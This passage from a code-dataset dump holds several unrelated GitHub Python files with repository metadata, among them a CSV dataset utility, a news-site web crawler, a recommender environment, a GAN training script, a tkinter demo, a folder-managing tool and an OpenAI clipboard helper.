[{output_file_name}]... Note: This may take some time depending on the amount of data being extracted and computing power!\")\n json_normalize(output_file_data).drop_duplicates().rename(columns={c:cp for (c, cp) in zip(input_column_name, output_column_name)}).to_csv(output_file_name, index=index)\n print(\"Done!\")\n\n\ndef print_usage() -> None:\n print(\"USAGE 1: python ./create_dataset.py input_file output_file\")\n print('EXAMPLE 1: python ./create_dataset.py faculty.json faculty_all_attributes.csv\\n')\n print(\"USAGE 2: python ./create_dataset.py input_file output_file extract_columns\")\n print('EXAMPLE 2: python ./create_dataset.py faculty.json test1.csv \"id, researchInterest\"\\n')\n print(\"USAGE 3: python ./create_dataset.py input_file output_file extract_columns rename_extracted_columns\")\n print('EXAMPLE 3: python ./create_dataset.py faculty.json test2.csv \"id, researchInterest\" \"faculty_id, research_interest\"\\n')\n print(\"USAGE 4: python ./create_dataset.py input_file output_file extract_columns rename_extracted_columns indexing\")\n print('EXAMPLE 4: python ./create_dataset.py faculty.json test3.csv \"id, researchInterest\" \"faculty_id, research_interest\" True')\n\ndef create_full_dataset(filepath,output_file):\n with open(filepath) as f:\n data = json.load(f)\n df = json_normalize(data)\n df = df.replace(r'[^\\w\\s]|_', ' ', regex=True)\n df.to_csv(output_file, index=True)\n\n\ndef createDataset(argv):\n num_args = len(argv)\n\n try:\n if num_args == 2:\n create_full_dataset(argv[0], argv[1])\n elif num_args == 3:\n create_dataset(argv[0], argv[1], argv[2].replace(\" \", \"\").split(\",\"))\n elif num_args == 4:\n create_dataset(argv[0], argv[1], argv[2].replace(\" \", \"\").split(\",\"), argv[3].replace(\" \", \"\").split(\",\"))\n elif num_args == 5:\n create_dataset(argv[0], argv[1], argv[2].replace(\" \", \"\").split(\",\"), argv[3].replace(\" \", \"\").split(\",\"), bool(argv[4]))\n else:\n print(\"Please specify the correct number of args.\\n\")\n print_usage()\n except:\n print_usage() ","repo_name":"CS411DSO-SP23/Awesome-Academic-Mentor","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"26146613045","text":"import json\nimport time\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\n\ndef scrape(site):\n #Set up a session that retries with backoff delays\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=0.5)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n #Request the site\n response = session.get(site)\n #Check for OK status code\n if response.status_code == 200:\n #Parse the site\n bs = BeautifulSoup(response.text, 'html.parser')\n #Get all 'a' tags\n links = bs.findAll('a')\n #Remove tags without 'href' attribute\n links_a = [l for l in links if l.has_attr('href')]\n #Store all links from 'href' in a list\n links_b = [l['href'] for l in links_a]\n #Only keep pages from the same site\n links_c = [l for l in links_b if 'https://www.bjpenn.com/mma-news/' in l]\n #Drop duplicates\n links_d = list(set(links_c))\n #Grab the 'body' tag and remove any 'style' and 'script' tags from it\n bs = bs.find('body')\n for data in bs(['style', 'script']):\n data.decompose()\n #Return list of links and texts from inside of 'body' tag\n return links_d, ' '.join(bs.stripped_strings)\n \n #Return empty list of 
links and empty text if there was an error\n return [], \"\"\n\n\nif __name__ == \"__main__\":\n links = ['https://www.bjpenn.com/mma-news/']\n data = {}\n index = 0\n max_links = 30000\n\n #Loop until we are out of links or reach our max\n for i in tqdm (range(max_links), desc=\"Scraping...\"):\n #If we run out of new links\n if(index >= len(links)):\n break;\n #Scrape current site\n new_links, html = scrape(links[index])\n #Append new links to the end of our list\n [links.append(l) for l in new_links if l not in links]\n #Save the current link and its html in the data\n data[links[index]] = html\n #Increment index\n index = index + 1\n \n #Save data into a file\n with open(\"data.json\", \"w\") as outfile:\n json.dump(data, outfile)","repo_name":"patrickfenn/Web-Crawler-Search-Engine","sub_path":"previous-versions/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29712896825","text":"'''@file argtype_factory.py\ncontains the type factory'''\n\nfrom assist.tasks.argtypes.argtypes import Enumerable\n\ndef factory(type_element):\n '''creates a type based on the Tree element\n\n Args:\n type_element: the type element as a Element from an ElementTree\n\n Returns:\n a argument type\n '''\n\n if type_element.attrib['supertype'] == 'enumerable':\n options = type_element.text.split('\\n')\n options = [option.strip() for option in options\n if option.strip() != '']\n argtype = Enumerable(options=options)\n else:\n raise Exception('unknown argtype %s' % type_element.supertype)\n\n return argtype\n","repo_name":"vrenkens/assist","sub_path":"assist/tasks/argtypes/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"56"} +{"seq_id":"39670386363","text":"#!/usr/bin/python\n# encoding: utf-8\n\nimport numpy as np\nimport ipdb\nimport numpy as np\nimport ipdb\nfrom .. 
import logger\nfrom sklearn.model_selection import train_test_split\nfrom collections import OrderedDict\nfrom ..util import *\nimport math\nfrom collections import Counter\nimport copy as cp\n\n# TODO:\nclass env(object):\n def __init__(self, args, dls, ui_cls = None):\n logger.log(\"initialize environment\")\n self.T = args.T\n self.rates = {}\n self.items = {}\n self.users = {}\n self.utypes = {}\n self.utype_kind = {}\n self.ideal_list = {}\n self.args = args\n self.dls = dls\n self.ui_cls = ui_cls\n\n p_data = dls.pre_training_data\n\n item_id2iid = {}\n\n def _load_data(data):\n for index, row in data.iterrows():\n uid = row.user_id\n item_id = row.item_id\n rating = row.rating\n if uid not in self.rates:\n self.rates[uid] = {}\n \n if item_id not in item_id2iid:\n item_id2iid[item_id] = len(item_id2iid) + 1\n\n iid = item_id2iid[item_id]\n\n self.rates[uid][iid] = rating\n \n self.items[iid] = rating # maintain api\n \n _load_data(p_data)\n\n for online_id in dls.online_id_stat:\n id_data = dls.grouped_data.get_group(online_id)\n _load_data(id_data) \n\n # with open(path_join(self.args.data_path, \"env.dat\"), \"r\") as f:\n # for line in f:\n # line = line.strip(\"\\n\").split(\"\\t\")\n # iid = list(map(lambda x:x.split(\":\"),line[1:]))\n # self.rates[int(line[0])] = {int(i[0]):int(i[1]) for i in iid}\n # for i in iid: self.items[int(i[0])]=int(i[1]) # 只用来统计 self.item_num 用\n\n logger.log(\"user number: \" + str(len(self.rates) + 1))\n logger.log(\"item number: \" + str(len(self.items) + 1))\n logger.log(\"user type\"\n \" number: \" + str(len(self.utype_kind) + 1))\n \n # self.setup_train_test()\n self.setup_train_test_()\n\n @property\n def user_num(self):\n return len(self.rates) + 1\n\n @property\n def item_num(self):\n return len(self.items) + 1\n\n @property\n def utype_num(self):\n return len(self.utypes) + 1\n\n def setup_train_test(self):\n users = list(range(1, self.user_num))\n np.random.shuffle(users)\n self.training, self.validation, self.evaluation = np.split(np.asarray(users), [int(.85 * self.user_num - 1),\n int(.9 * self.user_num - 1)])\n\n def setup_train_test_(self):\n self.training = np.array(self.dls.pre_training_data[\"user_id\"].drop_duplicates())\n\n self.evaluation = np.array(self.dls.online_id_stat)\n\n def reset(self):\n self.reset_with_users(np.random.choice(self.training))\n\n def reset_with_users(self, uid):\n self.state = [(uid,1), []]\n self.short = {}\n return self.state\n\n def step(self, action):\n \"\"\"\n self.rates: \n dict: uid -> rating_dict\n rating_dict:item_id -> rating\n \n self.state:\n list:\n 0:tuple (uid, xx)\n 1:list\n \"\"\"\n if action in self.rates[self.state[0][0]] and (not action in self.short):\n # rate = self.rates[self.state[0][0]][action]\n # if rate >= 4:\n # reward = 1\n # else:\n # if self.dls.datan in [\"KuaiRec\"]:\n # reward = rate\n # else:\n # reward = 0\n \n online_round = len(self.state[1])\n uid = self.state[0][0]\n user = AbstractUser(uid, online_round)\n rate, reward = self.dls.feedback(user, action)\n\n else:\n rate = 0\n reward = 0\n\n if len(self.state[1]) < self.T - 1:\n done = False\n else:\n done = True\n self.short[action] = 1\n t = self.state[1] + [[action, reward, done]]\n info = {\"precision\": self.precision(t),\n \"recall\": self.recall(t, self.state[0][0]),\n \"rate\":rate}\n self.state[1].append([action, reward, done, info])\n return self.state, reward, done, info\n\n def step_policy(self,policy):\n policy = policy[:self.args.T]\n rewards = []\n for action in policy:\n if action in 
self.rates[self.state[0][0]]:\n rewards.append(self.rates[self.state[0][0]][action])\n else:\n rewards.append(0)\n t = [[a, rewards[i], False] for i,a in enumerate(policy)]\n info = {\"precision\": self.precision(t),\n \"recall\": self.recall(t, self.state[0][0])}\n self.state[1].extend(t)\n return self.state,rewards,True,info\n\n\n def ndcg(self, episode, uid):\n if len(self.rates[uid]) > len(episode):\n return self.dcg_at_k(list(map(lambda x: x[1], episode)),\n len(episode),\n method=1) / self.dcg_at_k(sorted(list(self.rates[uid].values()),reverse=True),\n len(episode),\n method=1)\n else:\n return self.dcg_at_k(list(map(lambda x: x[1], episode)),\n len(episode),\n method=1) / self.dcg_at_k(\n list(self.rates[uid].values()) + [0] * (len(episode) - len(self.rates[uid])),\n len(episode), method=1)\n\n def dcg_at_k(self, r, k, method=1):\n r = np.asfarray(r)[:k]\n if r.size:\n if method == 0:\n return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))\n elif method == 1:\n return np.sum(r / np.log2(np.arange(2, r.size + 2)))\n else:\n raise ValueError('method must be 0 or 1.')\n\n def alpha_dcg(self, item_list, k=10, alpha=0.5, *args):\n items = []\n G = []\n for i, item in enumerate(item_list[:k]):\n items += item\n G.append(sum(map(lambda x: math.pow(alpha, x - 1), dict(Counter(items)).values())) / math.log(i + 2, 2))\n return sum(G)\n\n def precision(self, episode):\n return sum([i[1] for i in episode])\n\n def recall(self, episode, uid):\n if self.dls.datan in [\"KuaiRec\"]:\n satisfield_num = (np.array(list(self.rates[uid].values())) >= 1).sum()\n else:\n satisfield_num = (np.array(list(self.rates[uid].values())) >= 4).sum()\n # if satisfield_num == 0:\n # return 0\n\n # return sum([i[1] for i in episode]) / len(self.rates[uid])\n return sum([i[1] for i in episode]) / satisfield_num\n\nclass AbstractUser:\n def __init__(self,id,online_round) -> None:\n self.online_round = online_round\n self.id = id","repo_name":"jzhang-0/iGCF","sub_path":"src/NICF/envs/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"73266043694","text":"import os\nimport argparse\n\nfrom utils import *\nfrom SalienGAN import SalienGAN\nimport torch\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--phase',type=str,default='train',help=\"train or test?\")\n parser.add_argument('--model_name',type=str,default='SalienGAN',help=\"model name\")\n parser.add_argument('--dataset',type=str,default='Hayao',help=\"dataset_name\")\n parser.add_argument(\"--batch_size\", type = int, default = 2,help = \"Size of each batches (Default: 128)\")\n parser.add_argument('--data_mean',type=list,default=[7.6287,-3.3273,-4.3014],help='data_mean(bgr) from data_mean.py')\n parser.add_argument('--epoch', type=int, default=101, help='The number of epochs to run')\n parser.add_argument('--init_epoch', type=int, default=8, help='The number of epochs for weight initialization')\n parser.add_argument('--save_freq', type=int, default=1, help='The number of ckpt_save_freq')\n\n parser.add_argument('--init_lr', type=float, default=2e-4, help='The learning rate')\n parser.add_argument('--g_lr', type=float, default=0.0002, help='The learning rate')\n parser.add_argument('--d_lr', type=float, default=0.0004, help='The learning rate')\n parser.add_argument(\"--beta1\", type = float, default = 0.5,help = \"Coefficients used for computing running averages of gradient and its square\")\n 
parser.add_argument(\"--beta2\", type = float, default = 0.99,help = \"Coefficients used for computing running averages of gradient and its square\")\n\n parser.add_argument('--adv_g_weight', type=float, default=300.0, help='Weight of generator about GAN')\n parser.add_argument('--adv_d_weight', type=float, default=300.0, help='Weight of generator about GAN') #\n parser.add_argument('--content_weight', type=float, default=1.5, help='Weight about VGG19') # 1.1 for Shinkai\n parser.add_argument('--texture_weight', type=float, default=1.0, help='Weight about texture')\n parser.add_argument('--shading_weight', type=float, default=10.0, help='Weight about picture color and shadiing')\n\n parser.add_argument('--img_size', type=list, default=[256,256], help='The size of image: H and W')\n\n parser.add_argument('--ch', type=int, default=64, help='base channel number per layer')\n parser.add_argument('--n_dis', type=int, default=3, help='The number of discriminator layer')\n parser.add_argument('--sn', type=str2bool, default=True, help='using spectral norm')\n\n parser.add_argument('--training_rate', type=int, default=1, help='training rate about G & D') #??\n parser.add_argument('--gan_type', type=str, default='lsgan', help='[gan / lsgan / wgan-gp / wgan-lp / dragan / hinge]')\n\n parser.add_argument(\"--gpu_id\", type = int, default = 0 ,help = \"Select the specific gpu to training\")\n\n parser.add_argument('--checkpoint_dir', type=str, default='checkpoint',help='Directory name to save the checkpoints')\n parser.add_argument('--result_dir', type=str, default='results',help='Directory name to save the generated images')\n parser.add_argument('--log_dir', type=str, default='logs',help='Directory name to save training logs')\n parser.add_argument('--sample_dir', type=str, default='samples',help='Directory name to save the samples on training')\n return check_args(parser.parse_args())\n\ndef check_args(args):\n # --checkpoint_dir\n check_folder(args.checkpoint_dir)\n if args.phase == 'test':\n # --result_dir\n check_folder(args.result_dir)\n\n # --log_dir\n check_folder(args.log_dir)\n\n # --sample_dir\n check_folder(args.sample_dir)\n\n # --epoch\n try:\n assert args.epoch >= 1\n except:\n print('number of epochs must be larger than or equal to one')\n\n # --batch_size\n try:\n assert args.batch_size >= 1\n except:\n print('batch size must be larger than or equal to one')\n return args\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n # Device\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.gpu_id)\n\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize Generator and Discriminator\n myGAN = SalienGAN(args, device)\n\n # Start Training\n myGAN.train(device)\n","repo_name":"ZhengjieFANG/SalienGAN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"22009430768","text":"import pathlib\r\nimport shutil\r\nimport numpy as np\r\nimport os\r\n\r\ndata = {0:\"\", 1:\"\", 2:\"\", 3:\"\", 4:\"\",5:\"\"}\r\n\r\ndef getCommands():\r\n u_input = str(input(\">> \"))\r\n u_output = u_input.split()\r\n i = 0\r\n for x in u_output:\r\n data[i] = x\r\n i = i + 1\r\n return data\r\n\r\ntry:\r\n logo = open(\"logo.txt\", \"r\")\r\n logo_rend = logo.read()\r\n print(logo_rend)\r\n while data[0] != \"quit\":\r\n getCommands()\r\n if data[0] == \"create\":\r\n path = pathlib.Path(data[2])\r\n new_dir = path / data[1]\r\n if 
new_dir.is_dir() != True:\r\n new_dir.mkdir(exist_ok=True)\r\n pack_dir = new_dir / f\"{data[1]}_lib\"\r\n pack_dir.mkdir(exist_ok=True)\r\n if data[3] == \"python\":\r\n main_file = open(f\"{new_dir}/{data[4]}.py\", \"w+\")\r\n pack_file = open(f\"{pack_dir}/__init__.py\",\"w+\")\r\n main_file.write(\"\")\r\n pack_file.write(\"\")\r\n if data[5] != \"\":\r\n main_file.write(f\"import {data[5]}\")\r\n main_file.close()\r\n pack_file.close()\r\n print(\">> Project created successfully\")\r\n else:\r\n print(\"Invalid Input\\n\")\r\n elif data[0] == \"delete\":\r\n del_path = pathlib.Path(data[1])\r\n if del_path.is_dir() == True:\r\n shutil.rmtree(del_path)\r\n print(\"Project Deleted Successfully\\n\")\r\n elif data[0] == \"help\":\r\n print(\">> command guide:\\n1. create \\n2. delete \\n3. quit\\n\")\r\n elif data[0] == \"quit\":\r\n print(\">> quitting Program...\\n\")\r\n else:\r\n print(\">> this command doesn't exist\")\r\nexcept IndexError:\r\n print(\">> invalid input\")\r\n","repo_name":"HoshiKami/project_manager","sub_path":"ProjectManager.py","file_name":"ProjectManager.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"41668338068","text":"# coding: utf-8\n\nfrom _common.page_object import PageObject\nfrom _common.xjb_decorator import robot_log\n\nimport huaxin_ui.ui_android_xjb_3_0.fund_assets_page\nimport time\n\nFUND_TYPE = \"xpath_//android.view.View[contains(@content-desc,'%s') and @focusable='true']\"\n\n\nclass FundAssetsStructurePage(PageObject):\n def __init__(self, web_driver):\n super(FundAssetsStructurePage, self).__init__(web_driver)\n\n @robot_log\n def verify_page_title(self):\n self.assert_values('资产结构', self.get_text(self.page_title, 'find_element_by_id'))\n\n page = self\n return page\n\n @robot_log\n def verify_fund_assets_structure_details(self):\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='资产配置']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='混合型']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='货币型']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='行业分布']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='债券品种']\")))\n\n page = self\n return page\n\n @robot_log\n def go_to_fund_assets_page(self, fund_type):\n time.sleep(2)\n self.perform_actions(\n FUND_TYPE % (fund_type)\n )\n\n page = huaxin_ui.ui_android_xjb_3_0.fund_assets_page.FundAssetsPage(self.web_driver)\n\n return page\n","repo_name":"wanglili1703/firewill","sub_path":"huaxin/huaxin_ui/ui_android_xjb_3_0/fund_assets_structure_page.py","file_name":"fund_assets_structure_page.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"19551911332","text":"\"\"\"\nAuthors: Marshall Jones, Johnny Lavette, and Eric Dyer\nProject 9\nFile: imagedemo.py\n\nThis program displays an image in a GUI with a caption about the Moon Man.\n\"\"\"\n\nfrom breezypythongui import EasyFrame\nfrom tkinter import PhotoImage\nfrom tkinter.font import Font\n\nclass ImageDemo(EasyFrame):\n \"\"\"Displays an image and a caption.\"\"\"\n\n def __init__(self):\n \"\"\"Sets up the window and widgets.\"\"\"\n EasyFrame.__init__(self, title = \"Image Demo\")\n self.setResizable(False)\n imageLabel = 
self.addLabel(text = \"\",\n row = 0, column = 0,\n sticky = \"NSEW\")\n textLabel = self.addLabel(text = \"Moon Man's silhouette stands out against the stark contrast of the beautiful Earth.\",\n row = 1, column = 0,\n sticky = \"NSEW\")\n \n # Load the image and associate it with the image label.\n self.image = PhotoImage(file = \"moon.gif\")\n imageLabel[\"image\"] = self.image\n\n # Set the font and color of the caption.\n font = Font(family = \"Verdana\", size = 12, slant = \"italic\")\n textLabel[\"font\"] = font\n textLabel[\"foreground\"] = \"blue\"\n\ndef main():\n \"\"\"The starting point for launching the program.\"\"\"\n ImageDemo().mainloop()\n\n# Instantiates and pops up the window.\nif __name__ == \"__main__\":\n main()\n","repo_name":"marshallbtc/CSCI-111","sub_path":"Project09/imagedemo.py","file_name":"imagedemo.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"35171310325","text":"#!/usr/bin/python3\n\nimport openai\nimport sys\n\nif sys.platform == \"win32\":\n import win32clipboard\n def to_clipboard(text):\n win32clipboard.OpenClipboard()\n win32clipboard.EmptyClipboard()\n win32clipboard.SetClipboardText(text)\n win32clipboard.CloseClipboard()\nelif sys.platform == \"darwin\":\n import subprocess\n def to_clipboard(text):\n process = subprocess.Popen(\n \"pbcopy\", env={\"LANG\": \"en_US.UTF-8\"}, stdin=subprocess.PIPE\n )\n process.communicate(text.encode(\"utf-8\"))\nelif sys.platform.startswith(\"linux\"):\n import subprocess\n def to_clipboard(text):\n process = subprocess.Popen(\n \"xsel --clipboard --input\", shell=True, stdin=subprocess.PIPE\n )\n process.communicate(text.encode(\"utf-8\"))\nelse:\n raise Exception(\"Unsupported platform\")\n\nopenai.api_key = \"YOUR_API_KEY\"\n\ndef generate_response(prompt):\n completions = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=prompt,\n max_tokens=1024,\n n=1,\n stop=None,\n temperature=0.5,\n )\n message = completions.choices[0].text\n return message\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n raise Exception(\"Invalid number of arguments\")\n\n if sys.argv[1] == \"-h\":\n print(\"Usage: python script.py [-c | phrase]\")\n print(\"-c: start an infinite loop to ask questions and receive answers\")\n print(\"phrase: the phrase to ask CHATGPT (enclosed in quotes if it contains spaces)\")\n elif sys.argv[1] != \"-c\":\n prompt = sys.argv[1]\n response = generate_response(prompt)\n print(response)\n to_clipboard(response)\n else:\n while True:\n prompt = input(\"Enter a question (or 'exit' to exit): \")\n if prompt.strip().lower() == \"exit\":\n break\n response = generate_response(prompt)\n print(response)\n to_clipboard(response)\n\n","repo_name":"AlrikRr/oi-gpt","sub_path":"oi-gpt.py","file_name":"oi-gpt.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"}